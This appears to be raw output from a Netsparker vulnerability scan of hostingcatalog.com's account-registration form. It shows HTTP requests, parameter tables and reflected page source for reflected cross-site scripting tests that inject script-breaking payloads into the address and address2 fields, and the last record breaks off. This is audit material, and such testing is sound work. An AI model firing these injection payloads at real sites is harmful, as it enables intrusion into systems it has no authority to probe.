window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD6229B88A7A2FC0F3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBDFD8C262E2A0492206F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD856869A1D615380CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD1F08383680609ECDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBD66CAF9AA8649A9D96F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBDB2CFF49E59CD9E75C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBD7BD6F32DD7D69FADC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBD40E83C4BC2ABD50C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBDED81542F06DC87DDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBD4F973DD2713692A16F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBD7E8C2E8AA887A5EFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBD66B214DAB8E00CC8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBD1F45E6D60FADC52FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDD24BC5C5DAC4803CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBDCCC306D8F07BB48CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBDEA4F1F00DF233992C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBD5A8D6214527DC28A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBDAF9D507C11820F5B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBD3CE6AFA9417F0F306F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
'"--></style></script><script>alert(0x001D87)</script>
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 544 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D87)%3c%2fscript%3e&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD6E7A16FE2DF5D033C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD874B0F98FD2ECF1A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD973780FD0ED9D4F9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDEA917B66507F6071C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBD84FB45C1B5393F486F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBD5C792A2ACC25A560C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDF355FC0C286612C3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBD4D629CD867E5D4C86F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBD6D8BA6FB5A55010AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBD8042B6B4810B67BF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBDE09AD37D2A9FD1FBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBD99AFB73C9916816EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBDE3BB85ABC88A1F74C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD03FFDA02FA5519FFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD1D024C8466F2CECBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBD420C1851ADE85456C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBD16E769593A27DF256F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD38B7E97A45B876916F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBDB657389E3F7527556F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
'"--></style></script><script>alert(0x001D88)</script>
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 544 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D88)%3c%2fscript%3e&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
